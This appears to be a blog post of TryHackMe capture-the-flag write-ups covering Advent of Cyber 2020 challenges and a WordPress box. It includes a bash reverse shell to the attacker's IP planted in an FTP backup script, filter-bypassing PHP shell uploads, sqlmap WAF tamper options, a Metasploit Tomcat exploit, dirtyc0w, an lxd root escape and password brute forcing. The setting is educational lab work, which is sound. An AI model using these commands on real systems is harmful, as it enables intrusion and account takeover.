Get started with Cyber Security in 25 Days – Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

https://tryhackme.com/room/adventofcyber2

Here are my writeups! Happy Holidays folks 🎄

Day 1: #Web #Cookies A Christmas Crisis

• modify basic auth cookie to bypass authentication for user santa.
• cookie format is in hexadecimal which is presented as json when decoded.

Day 2: #Web #RCE The Elf Strikes Back

• login using provided ID via GET parameter.
• set up a simple php reverse shell
• bypass upload filter by adding .jpg before true extension.
• set up ncat listener: rlwrap ncat -lvnp $PORT
• visit upload directory and open uploaded php reverse shell.
• get www-data shell and get flag.

Day 3: #Web #Authentication Christmas Chaos

• attempt login and capture login URI.
• utilise burp cluster bomb with 2 payload sets for: username and password.
• run attack and compare response length to find correct credentials.
• login using these credentials for flag

Day 4: #Web #Fuzzing Santa's Watching

• scan for common directories —> find /api
• api file site-log.php used for querying site logs by date
• fuzz probable dates using wfuzz: wfuzz -c -z file,$WORDLIST -u $URI/api/site-log.php?date=FUZZ

Day 5: #Web #SQLi Someone stole Santa's gift list!

• bypass login using basic SQLi payload
• use info provided to launch sqlmap against the search parameter.
• burp –> capture request –> send to repeater –> save request.
• sqlmap -r $saved_request --tamper=space2comment --dump-all -dbms sqlite.
  • space2comment is a WAF bypass method. This can be identified via --identify-waf.
  • other WAF bypasses are available where needed.
• use db dumps to answer all questions.

Day 6: #Web #XSS Be careful with what you wish on a Christmas night

• web app is vulnerable to both reflected and stored XSS.
• OWASP ZAP can be used for automated scanning.
• The original compromise most likely utilised the stored XSS vulnerability and redirected a visitor to a malicious website upon clicking a certain hyperlink (by modifying <a> tags or by doing something like location.replace).

Day 7: #Networking #Wireshark The Grinch Really Did Steal Christmas

We're given 3 pcaps that need to be analysed.

pcap1

• find icmp traffic – type icmp in filter bar
• find all HTTP GET requests – http.request.method == GET
• find web pages visited (HTTP) by specific host – ip.src == 10.10.67.199 && http.request.method == GET

pcap 2

• find plaintext password in ftp traffic – ftp.request.command==PASS
• find encrypted protocol used – statistics > protocol hierarchy (from this we see SSH which is an encrypted protocol)

pcap 3

• recover files sent in the wire – file > export objects > http

Day 8: #Networking #nmap #enumeration What's Under the Christmas Tree?

A quick recap of nmap:

• -sT – TCP scan
• -sS – SYN scan – default
• -A – aggressive scan (includes OS, version, script and traceroute scans)
• --script vuln – scan for common vulnerabilities on open ports
  • additional scripts: enip-info, rdp-ntlm-info, http-enum
  • tip: you can use * as a wildcard when using --script.

Day 9: #Networking #ftp Anyone can be Santa!

• find anonymous ftp directories using nmap $IP -sV --script=ftp-anon
• ftp in and retrieve backup.sh
• set up reverse shell on local host: rlwrap ncat -lnvp 4242
• upload backup script back to the ftp server with an added bash reverse shell: sh -i >& /dev/udp/$THM_IP/4242 0>&1
• we should get a root shell on remote host this way.

Day 10: #Networking #smb Don't be sElfish!

enum4linux -U $IP – enumerate users on SMB server enum4linux -S $IP – enumerate shares on SMB server smbclient //$IP/$ShareName – connect to SMB share

Day 11: #Networking #privesc The Rogue Gnome

• we're given details to log in to ssh as the cmatic user.
• it appears to be a limited account without any sudo access, let's send over LinEnum.sh to automate enumeration for us.
• on the target machine: nc -l -p 1337 > /tmp/LinEnum.sh
• on the attacking machine: nc -w 3 $machineIP 1337 < LinEnum.sh
• The above should send the file from our machine to the target machine via nc (timeout -w at 3 secs)
• SUID enumeration reveals /bin/bash has SUID bit set
• With /bin/bash -p we get a root shell. The -p tells the shell to maintain the euid which in this case is 0 (root) due to SUID.

Day 12: #Networking #initialaccess Ready, Set, Elf

• nmap (-sC -sV)
• we see tomcat 9.0.17 being used
• searching that in exploit-db we find possible code exec CVEs

metasploit:

msfconsole
search CVE-2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
set lhost tun0
set rhost $remotehostIP
set URI $remotehostCGI
check
exploit
shell

the above gets us a user shell. Check privs with run post/windows/gather/win_privs

Day 13: #exploitation Coal for Christmas

• scan machine with nmap – notice telnet
• connect to telnet and log in with creds displayed
• Enumuration tips:
  • cat /etc/*release
  • cat /etc/issue
• Ubuntu 12.04 with kernel 3.2.0-23-generic – vulnerable to dirtyc0w.
• Transfer dirtyc0w source code to target machine and compile
• run and create a root privileged account!

Day 14: #osint Where's Rudolph?

• https://scylla.sh/ – neat place to find dehashed passwords.
• always check the entire post history of an account if possible.

Day 15 & 16: #python

#!/usr/bin/env python3
## TryHackMe Advent Calendar 2020 Day 16
## https://tryhackme.com/room/adventofcyber2

import requests

# The code below assumes an api endpoint with a odd-numbered key that we don't know the value of. The correct value will produce a flag.
# for loop to go over 1-100 key values, step by 2 to have odd numbers only

for api_key in range(1,100,2):
    # print what api key value we are iterating
    print(f"api_key {api_key}")
    # this is the api endoing we are sending requests to
    r = requests.get(f'http://EDITME_THMIP:8000/api/{api_key}')
    # only print text out if there are no failures or protections in place
    if "Error" not in str(r.text) and "PROTECTION" not in str(r.text):
        print(r.text)

Day 19: #SSRF #web The Naughty or Nice List

1. Observe that searches are proxied internally via http://list.hohoho:8080/search.php?name=.
2. Since an internal server is exposed, there are numerous things to do:
   • visit root of the host exposed e.g. http://list.hohoho:8080 via the URI parameter.
   • try different ports for enumeration.
   • check for any app side blocking/filtering e.g. visiting localhost via the proxy. If blocked, consider using localtest.me which resolves to 127.0.0.1 e.g. proxy=http://list.hohoho.localtest.me
   • this could lead to some sensitive exposure.

Day 17 & 18: #reversing #assembly #dotnet ReverseELFneering & The Bits of Christmas

Opening a binary with radare2 – r2 -d <file> Analysing a binary – aa List of functions – afl Print disassembly function – pdf @<function> Breakpoint – db <reference> Run program until breakpoint – dc View contents of memory address – px @<memory address> Move to next instruction – ds View %eax register – dr Reload program – ood

For DotNet applications, ILSpy and Dotpeek are good tools that can be used to decompile .NET applications and potentially view methods that contains information to bypass certain checks or authentication.

Day 20: #powershell PowershELlF to the rescue

Some intro to powershell and navigating the file and directory system:

Get-ChildItem -Path <> -File/-Directory -Hidden -ErrorAction SilentlyContinue The above would look for all items in a specified path that has either hidden files or folders and would not worry about any errors.

Measure-Object Can be piped to provide info on an object like words e.g. Get-Content file.txt | Measure-Object -Word

(Get-Content -Path file.txt)[index] Read something in a file at a specfic position. E.g. ...file.txt)[100] for the 99th character.

Select-String -Path ./Desktop -Pattern '*.txt' Find all txt files within the desktop. Can also be used to search for strings within a file.

Day 21: #forensics #powershell Time for some ELForensics

• ADFS is a part of NTFS and can contain alternate data streams not visible to the user. Calculate MD5: Get-FileHash -Algorithm MD5 <file> View streams: Get-Item -Path file.exe -Stream * Launch the stream/s found: wmic process call create $(Resolve-Path file.exe:streamname)

Day 22: #forensics Elf McEager becomes CyberElf

Data decoding via https://gchq.github.io/CyberChef/

Day 23: #forensics The Grinch strikes again!

• malicious scheduled tasks may often be utilised by ransomware operators.
• volume shadow copy service (VSS) creates “snapshots” of data. This can be interacted with using vssadmin
• for any hidden volumes, they may be able to have a drive path assigned to them and mounted. Checking for hidden files and folders is also advisable in that volume.

Day 24

Find hidden web directories and php pages:

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x php

Visit the discovered file upload page and try to upload a reverse PHP shell. A simple file rename to .jpg.php doesn't work. See network connections and notice filter.js. Block this to circumvent the client side filter. Visit the file once shell is uploaded and reverse shell listener is set up.

rlwrap ncat -nlvp 1234

Upgrade shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

After finding the DB creds in the includes folder, connect to it using MySQL client.

$ msql -utron -p
$ show databases;
$ use tron;
$ show tables;
$ select * from users;

We find the user flynn's hashed password which can be cracked via crackstation. Using these credentials, SSH into localhost (or use su flynn). The flyn user is in the lxd group, allowing us to interact with linux containers (lxc).

$ lxc image list # see if there are any images we can use
$ lxc init $IMAGENAME $CONTAINERNAME -c security.privileged=true # create a new priv. container
$ lxc config device add $CONTAINERNAME $DEVICENAME disk source=/ path=/mnt/root recursive=true # add mounted device with path = root
$ lxc start $CONTAINERNAME
$ lxc exec $CONTAINERNAME /bin/sh # connect to the container shell 

Summary

• exploit Wordpress web server
• gain user shell
• use Python to escalate to root

Tools Used

• nmap, wpscan, python, pspy

Enum

Nmap

sudo nmap -A jack.thm -oN jack

nmap tells us we have a host running ssh and serving a wordpress application.

# Nmap 7.80 scan initiated Sun Aug 30 03:57:41 2020 as: nmap -A -oN jack -v jack.thm
Nmap scan report for jack.thm (10.10.126.131)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
|   256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_  256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.3.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/30%OT=22%CT=1%CU=42716%PV=Y%DS=4%DC=T%G=Y%TM=5F4B15C
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=106%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)OPS(O1=M509ST11NW7%O2=M509ST11NW7%O
OS:3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M509NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.014 days (since Sun Aug 30 03:38:38 2020)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   167.61 ms 10.13.0.1
2   ... 3
4   304.95 ms jack.thm (10.10.126.131)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 30 03:58:22 2020 -- 1 IP address (1 host up) scanned in 41.89 seconds

WPScan

wpscan --url jack.thm

XML-RPC seems to be enabled

We can use this to enumerate usernames. Let's try: * http://jack.thm/wp-json/wp/v2/users/1 – 200 – we are able to see the jack user (that we already know about) * http://jack.thm/wp-json/wp/v2/users/2 – 401 – not allowed to view this user * http://jack.thm/wp-json/wp/v2/users/99 – 404 – user not found

WPScan to the rescue as it provides user enumerition AND bruteforcing which may allow us into the wp-admin panel. We find 2 additional users.

wpscan --wpscan --url jack.thm --enumerate u

Put all three users into a users.txt file and use a wordlist of your choice to brute force. We are able to sucesfully obtain a password for a user. Use that to login to wp-admin.

wpscan --url jack.thm --passwords rockyou.txt --usernames users.txt

Unfortunately, once logged in, the user does not have any administrative rights. Time to move onto exploitation.

Exploit

User

• https://www.exploit-db.com/exploits/44595
• edit plugin php
• insert php reverse shell
• gain access to www-data user shell
• obtain user flag

Priv Esc

Our next aim is to move from www-data to jack. Fortunately, according to reminder.txt in jack's home directory, this user has an issue setting permissions on backups. Doing a quick check we find /var/backups that contains some goodies that www-data is able to read. Using this, we can SSH to the host.

find / -name backup* 2>/dev/null

Root

• linPEAS (or any other privesc script of choice)
• nothing of interest can be found apart from various interesting file access rights.
• hint reveals that python is being used.
• use pspy to monitor for any strange cronjobs by root

• 👀

  • 2020/08/30 00:26:01 CMD: UID=0 PID=3036 | /usr/bin/python /opt/statuscheck/checker.py

    python exploitation

checker.py:

import os

os.system("/usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log")

From previous linenum scripts jack is a part of family which has write access to /usr/lib/python2.7/

Since we know os.system is being used in the script we have a lot of options to gain root access such as:

• modify os.py to facilitate a reverse shell.
• change permissions of other files and folders within the system (as root).
• change ssh configs to allow for password-less root access via ssh.
• obtain the root flag and write it to a file that is world readable.

#tryhackme #wordpress #python